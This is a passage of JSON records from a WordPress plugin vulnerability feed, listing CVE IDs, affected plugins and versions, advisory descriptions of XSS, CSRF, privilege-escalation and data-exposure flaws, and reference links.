"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4190\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0838","slug":"happy-elementor-addons","versionImpact":"3.10.1","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the side image URL parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/widgets\\\/age-gate\\\/widget.php#L2121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/widgets\\\/age-gate\\\/widget.php#L2121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0719","slug":"tabs-shortcode-and-widget","versionImpact":"1.17","description":"The Tabs Shortcode and Widget WordPress plugin through 1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e67bf7f-07e6-432b-a8f4-aa69299aecaf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e67bf7f-07e6-432b-a8f4-aa69299aecaf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3198","slug":"wp-font-awesome-share-icons","versionImpact":"1.1.1","description":"The WP Font Awesome Share Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \r\n'wpfai_social' shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd066a04-8094-4004-8a64-317c6bd4e101?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd066a04-8094-4004-8a64-317c6bd4e101?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-font-awesome-share-icons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-font-awesome-share-icons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8732","slug":"leira-roles","versionImpact":"1.1.9","description":"The Roles & Capabilities plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3956cd40-6b46-4013-9d71-a979de2c3687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3956cd40-6b46-4013-9d71-a979de2c3687?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L541\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10343","slug":"beek-widget-extention","versionImpact":"0.9.5","description":"The Beek Widget Extention plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 0.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afc8de7-0d7e-4dee-972e-3eb707cd7b2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afc8de7-0d7e-4dee-972e-3eb707cd7b2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beek-widget-extention\\\/trunk\\\/inc\\\/call-to-action.php?rev=1249743#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beek-widget-extention\\\/trunk\\\/inc\\\/call-to-action.php?rev=1249743#L135\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9192","slug":"wp-video-robot","versionImpact":"1.20.0","description":"The WordPress Video Robot - The Ultimate Video Importer plugin for WordPress is vulnerable to privilege escalation due to insufficient validation on user meta that can be updated in the wpvr_rate_request_result() function in all versions up to, and including, 1.20.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta on a WordPress site. This can be leveraged to update their capabilities to that of an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da019d3-4aca-485a-aa0c-73728dc1e7c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da019d3-4aca-485a-aa0c-73728dc1e7c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-video-robot-plugin\\\/8619739\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-video-robot-plugin\\\/8619739\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10663","slug":"ele-blog","versionImpact":"1.8","description":"The Eleblog \u2013 Elementor Blog And Magazine Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the goodbye_form_callback() function in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ele-blog\\\/trunk\\\/inc\\\/class-ele-blog-quick-feedback.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ele-blog\\\/trunk\\\/inc\\\/class-ele-blog-quick-feedback.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f355d2c0-6133-4091-b900-1451ebba70c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f355d2c0-6133-4091-b900-1451ebba70c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11865","slug":"tabs-maker","versionImpact":"1.0","description":"The Tabs Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on tab descriptions. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tabs-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tabs-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284c5646-7728-45bd-9479-483c806ca804?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284c5646-7728-45bd-9479-483c806ca804?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12049","slug":"woo-ukrposhta","versionImpact":"1.17.11","description":"The Woo Ukrposhta plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'order', 'post', and 'idd' parameters in all versions up to, and including, 1.17.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit-international.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit-international.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/morkvaup-plugin-invoices-page.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/morkvaup-plugin-invoices-page.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-ukrposhta\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-ukrposhta\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e549e4c-9f2e-40a4-9b07-7edb34bc0c9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e549e4c-9f2e-40a4-9b07-7edb34bc0c9f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13719","slug":"pepro-ultimate-invoice","versionImpact":"2.0.8","description":"The PeproDev Ultimate Invoice plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.8 via the invoicing viewer due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view invoices for completed orders which can contain PII of users.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pepro-ultimate-invoice\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pepro-ultimate-invoice\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46186f8d-e50c-476a-9480-b6121412474a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46186f8d-e50c-476a-9480-b6121412474a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1504","slug":"post-lockdown","versionImpact":"4.0.2","description":"The Post Lockdown plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.0.2 via the 'pl_autocomplete' AJAX action due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-lockdown\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-lockdown\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447cef6f-fa2e-4087-946d-6e0214830ea9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447cef6f-fa2e-4087-946d-6e0214830ea9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4672","slug":"offsprout-page-builder","description":"The Offsprout Page Builder plugin for WordPress is vulnerable to Privilege Escalation due to improper authorization placed on the permission_callback() function in versions 2.2.1 to 2.15.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to read, create, update or delete any user meta, including flipping their own wp_capabilities to administrator and fully escalate their privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L514\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/offsprout-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/offsprout-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9269d18d-8d83-43ff-b777-ba8f58321e9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9269d18d-8d83-43ff-b777-ba8f58321e9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8399","slug":"mmm-unity-loader","versionImpact":"1.0","description":"The Mmm Unity Loader plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018attributes\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/mmm-unity-loader\\\/trunk\\\/mmm-unity-loader.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/mmm-unity-loader\\\/trunk\\\/mmm-unity-loader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mmm-unity-loader\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mmm-unity-loader\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cee1d75-278c-45c6-915d-60aae6a4d3a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cee1d75-278c-45c6-915d-60aae6a4d3a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0034","slug":"jetwidgets-for-elementor","versionImpact":"1.0.13","description":"The JetWidgets For Elementor WordPress plugin through 1.0.13 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbdb8a1-19c3-45e9-81b0-ad47a0791c4a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbdb8a1-19c3-45e9-81b0-ad47a0791c4a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1866","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the clearKeys function. This makes it possible for unauthenticated attackers to reset the plugin's channel settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45851efe-2584-4b5e-8e4c-24f289d3bc32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45851efe-2584-4b5e-8e4c-24f289d3bc32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L107\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3051","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'azh_post' shortcode in versions up to, and including, 1.27.133 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24486605-9324-4f19-9ca3-340d006432db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24486605-9324-4f19-9ca3-340d006432db?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2856\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2856\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2845\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3320","slug":"wp-sticky-social","versionImpact":"1.0.1","description":"The WP Sticky Social  plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing nonce validation in the ~\/admin\/views\/admin.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a272e12b-97a2-421a-a703-3acce2ed8313?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a272e12b-97a2-421a-a703-3acce2ed8313?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2926150%40wp-sticky-social&new=2926150%40wp-sticky-social\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2926150%40wp-sticky-social&new=2926150%40wp-sticky-social\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3492","slug":"shopping-pages","versionImpact":"1.14","description":"The WP Shopping Pages WordPress plugin through 1.14 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01b9b1c2-439e-44df-bf01-026cb13d7d40\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01b9b1c2-439e-44df-bf01-026cb13d7d40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7044","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.2","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom ID in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access and higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e770e98-3c13-4e37-b51b-4c39bce2cb42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e770e98-3c13-4e37-b51b-4c39bce2cb42?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013774\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013774\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0821","slug":"cost-of-goods-for-woocommerce","versionImpact":"3.2.8","description":"The Cost of Goods Sold (COGS): Cost & Profit Calculator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'section' parameter in all versions up to, and including, 3.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8731","slug":"leira-cron-jobs","versionImpact":"1.2.9","description":"The Cron Jobs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f6da693-4610-4875-aa14-102809309b8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f6da693-4610-4875-aa14-102809309b8d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-cron-jobs\\\/trunk\\\/admin\\\/class-leira-cron-jobs-admin.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-cron-jobs\\\/trunk\\\/admin\\\/class-leira-cron-jobs-admin.php#L147\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8964","slug":"sirv","versionImpact":"7.2.9","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 7.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b2435f-32a3-4158-a734-c21a0cab15be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b2435f-32a3-4158-a734-c21a0cab15be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sirv\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sirv\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162079\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162079\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10112","slug":"simple-news","versionImpact":"2.8","description":"The Simple News plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'news' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79147dad-4bce-40fb-b9c1-e211845251a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79147dad-4bce-40fb-b9c1-e211845251a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-news\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-news\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
